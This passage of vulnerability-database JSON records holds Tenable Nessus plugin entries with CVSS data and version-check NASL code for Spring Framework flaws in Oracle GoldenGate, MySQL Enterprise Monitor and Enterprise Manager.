service (DoS) vulnerability. This vulnerability is due to its use of Spring Framework, which provides support for range requests when serving static resources through the ResourceHttpRequestHandler or when an annotated controller returns an org.springframework.core.io.Resource. An unauthenticated, remote attacker can exploit this issue by adding a range header with a high number of ranges, or with wide ranges that overlap, or both to cause the application to stop responding.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-10-16T00:00:00", "type": "nessus", "title": "Oracle GoldenGate for Big Data 12.3.1.1.x < 12.3.1.1.6 / 12.3.2.1.x < 12.3.2.1.5 Spring Framework DoS (Oct 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:goldengate_application_adapters:"], "id": "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/129973", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129973);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-15756\");\n script_bugtraq_id(105703);\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle GoldenGate for Big Data 12.3.1.1.x < 12.3.1.1.6 / 12.3.2.1.x < 12.3.2.1.5 Spring Framework DoS (Oct 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Oracle GoldenGate for Big Data application on the remote host is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Oracle GoldenGate for Big Data application located on the remote\nhost is 12.3.1.1.x less than 12.3.1.1.6 or 12.3.2.1.x less than 12.3.2.1.5. It is, therefore, affected by a denial of\nservice (DoS) vulnerability. This vulnerability is due to its use of Spring Framework, which provides support for range\nrequests when serving static resources through the ResourceHttpRequestHandler or when an annotated controller returns\nan org.springframework.core.io.Resource. An unauthenticated, remote attacker can exploit this issue by adding a range\nheader with a high number of ranges, or with wide ranges that overlap, or both to cause the application to stop\nresponding.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b370bc74\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patches according to the October 2019 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-15756\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:goldengate_application_adapters:\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_goldengate_for_big_data_installed.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/Oracle GoldenGate for Big Data\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\n// Paranoid because the detection is looking for the presence of JAR files. It's possible that the customer has JAR\n// files from outdated versions on their system, but is not currently using them.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = 'Oracle GoldenGate for Big Data';\napp_info = vcf::get_app_info(app:app_name);\n\nconstraints = [\n { 'min_version':'12.3.1.1', 'fixed_version':'12.3.1.1.6' },\n { 'min_version':'12.3.2.1', 'fixed_version':'12.3.2.1.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-02T14:59:52", "description": "A denial of service (DoS) vulnerability exists in MySQL Enterprise Monitor due the use of a vulnerable Spring Framework version. Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, to cause a DoS. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 4.x < 4.0.10 / 8.x < 8.0.15 DoS (Jul 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_8_0_15.NASL", "href": "https://www.tenable.com/plugins/nessus/138904", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138904);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-15756\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"MySQL Enterprise Monitor 4.x < 4.0.10 / 8.x < 8.0.15 DoS (Jul 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"MySQL Enterprise Monitor running on the remote host is affected by a denial of service vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"A denial of service (DoS) vulnerability exists in MySQL Enterprise Monitor due the use of a vulnerable Spring Framework\nversion. Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older\nunsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the\nResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an\norg.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of\nranges, or with wide ranges that overlap, or both, to cause a DoS. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 4.0.10, 8.0.15 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-15756\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'MySQL Enterprise Monitor';\nport = get_http_port(default:18443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:true);\n\nconstraints = [\n {'min_version' : '4.0', 'fixed_version' : '4.0.10'},\n {'min_version' : '8.0', 'fixed_version' : '8.0.15'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-04T14:43:58", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework) is easily exploited and may allow an unauthenticated, remote attacker to takeover the Enterprise Manager Base Platform.\n (CVE-2018-1258, CVE-2018-11039, CVE-2018-11040, CVE-2018-1257, CVE-2018-15756)\n\n - Agent Next Gen (IBM Java) vulnerability allows unauthenticated, remote attacker unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data. (CVE-2018-1656, CVE-2018-12539)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential for a side-channel timing attack. An unauthenticated attacker can exploit this to disclose potentially sensitive information. (CVE-2018-0734, CVE-2018-0735, CVE-2018-5407)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-18T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0734", "CVE-2018-0735", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-12539", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-15756", "CVE-2018-1656", "CVE-2018-5407"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_APR_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/124157", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124157);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-0734\",\n \"CVE-2018-0735\",\n \"CVE-2018-1257\",\n \"CVE-2018-1258\",\n \"CVE-2018-1656\",\n \"CVE-2018-5407\",\n \"CVE-2018-11039\",\n \"CVE-2018-11040\",\n \"CVE-2018-12539\",\n \"CVE-2018-15756\"\n );\n script_bugtraq_id(\n 104222,\n 104260,\n 105118,\n 105126,\n 105703,\n 105750,\n 105758,\n 105897\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0130\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Apr 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework)\n is easily exploited and may allow an unauthenticated, remote attacker to takeover\n the Enterprise Manager Base Platform.\n (CVE-2018-1258, CVE-2018-11039, CVE-2018-11040, CVE-2018-1257, CVE-2018-15756)\n\n - Agent Next Gen (IBM Java) vulnerability allows unauthenticated, remote attacker\n unauthorized access to critical data or complete access to all Enterprise Manager\n Base Platform accessible data. (CVE-2018-1656, CVE-2018-12539)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential\n for a side-channel timing attack. An unauthenticated attacker can exploit\n this to disclose potentially sensitive information. \n (CVE-2018-0734, CVE-2018-0735, CVE-2018-5407)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9166970d\");\n # https://support.oracle.com/rs?type=doc&id=2498664.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba7181fa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019\nOracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1258\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('oracle_rdbms_cpu_func.inc');\ninclude('install_func.inc');\n\nproduct = 'Oracle Enterprise Manager Cloud Control';\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ '^13\\\\.3\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29433931';\n fix = '13.3.0.0.190416';\n}\nelse if (version =~ '^13\\\\.2\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29433916';\n fix = '13.2.0.0.190416';\n}\nelse if (version =~ '^12\\\\.1\\\\.0\\\\.5(\\\\.[0-9]+)?$')\n{\n patchid = '29433895';\n fix = '12.1.0.5.190416';\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n {\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', 'Missing patch');\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T15:02:35", "description": "The remote host contains a Spring Framework library version that is 4.3.x prior to 4.3.16 or 5.0.x prior to 5.0.5. It is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this, by sending a special craft message to the broker that can lead to RCE attack", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-02T00:00:00", "type": "nessus", "title": "Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework"], "id": "SPRING_CVE-2018-1270.NASL", "href": "https://www.tenable.com/plugins/nessus/129500", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129500);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-1270\");\n\n script_name(english:\"Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework library that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework library version that is\n4.3.x prior to 4.3.16 or 5.0.x prior to 5.0.5. It is, therefore,\naffected by a remote code execution vulnerability. An unauthenticated,\nremote attacker can exploit this, by sending a special craft message\nto the broker that can lead to RCE attack\");\n # https://pivotal.io/security/cve-2018-1270\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6875af7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 4.3.16 or 5.0.5 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1270\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:'Spring Framework');\n\nconstraints = [\n { 'min_version':'4.3', 'fixed_version':'4.3.16' },\n { 'min_version':'5.0', 'fixed_version':'5.0.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-23T02:29:32", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - A deserialization vulnerability in Apache Commons FileUpload allows for remote code execution.\n (CVE-2016-1000031)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential for a side-channel timing attack.\n An unauthenticated attacker can exploit this to disclose potentially sensitive information. (CVE-2018-0734)\n\n - A denial of service (DoS) vulnerability exists in Apache HTTP Server 2.4.17 to 2.4.34, due to a design error. An unauthenticated, remote attacker can exploit this issue by sending continuous, large SETTINGS frames to cause a client to occupy a connection, server thread and CPU time without any connection timeout coming to effect.\n This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.\n (CVE-2018-11763).\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework) is easily exploited and may allow an unauthenticated, remote attacker to takeover the Enterprise Manager Base Platform. (CVE-2018-1258)", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Ops Center (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2018-0161", "CVE-2018-0734", "CVE-2018-0735", "CVE-2018-5407", "CVE-2018-11763", "CVE-2017-9798", "CVE-2018-1258", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1257", "CVE-2018-15756"], "modified": "2019-05-17T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager_ops_center"], "id": "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/125147", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125147);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/05/17 9:44:17\");\n\n script_cve_id(\n \"CVE-2016-1000031\",\n \"CVE-2018-0161\",\n \"CVE-2018-0734\",\n \"CVE-2018-0735\",\n \"CVE-2018-5407\",\n \"CVE-2018-11763\",\n \"CVE-2017-9798\",\n \"CVE-2018-1258\",\n \"CVE-2018-11039\",\n \"CVE-2018-11040\",\n \"CVE-2018-1257\",\n \"CVE-2018-15756\"\n );\n\n script_bugtraq_id(\n 93604,\n 100872,\n 103573,\n 104222,\n 104260,\n 105414,\n 105703,\n 105750,\n 105758,\n 105897,\n 107984,\n 107986\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0130\");\n\n script_name(english:\"Oracle Enterprise Manager Ops Center (Apr 2019 CPU)\");\n script_summary(english:\"Checks for the patch ID.\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - A deserialization vulnerability in Apache Commons\n FileUpload allows for remote code execution.\n (CVE-2016-1000031)\n\n - An information disclosure vulnerability exists in OpenSSL\n due to the potential for a side-channel timing attack.\n An unauthenticated attacker can exploit this to disclose\n potentially sensitive information. (CVE-2018-0734)\n\n - A denial of service (DoS) vulnerability exists in Apache\n HTTP Server 2.4.17 to 2.4.34, due to a design error. An\n unauthenticated, remote attacker can exploit this issue\n by sending continuous, large SETTINGS frames to cause a\n client to occupy a connection, server thread and CPU\n time without any connection timeout coming to effect.\n This affects only HTTP/2 connections. A possible\n mitigation is to not enable the h2 protocol.\n (CVE-2018-11763).\n\n - Networking component of Enterprise Manager Base Platform\n (Spring Framework) is easily exploited and may allow an\n unauthenticated, remote attacker to takeover the\n Enterprise Manager Base Platform. (CVE-2018-1258)\n\n\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9166970d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019\nOracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager_ops_center\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_ops_center_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Ops 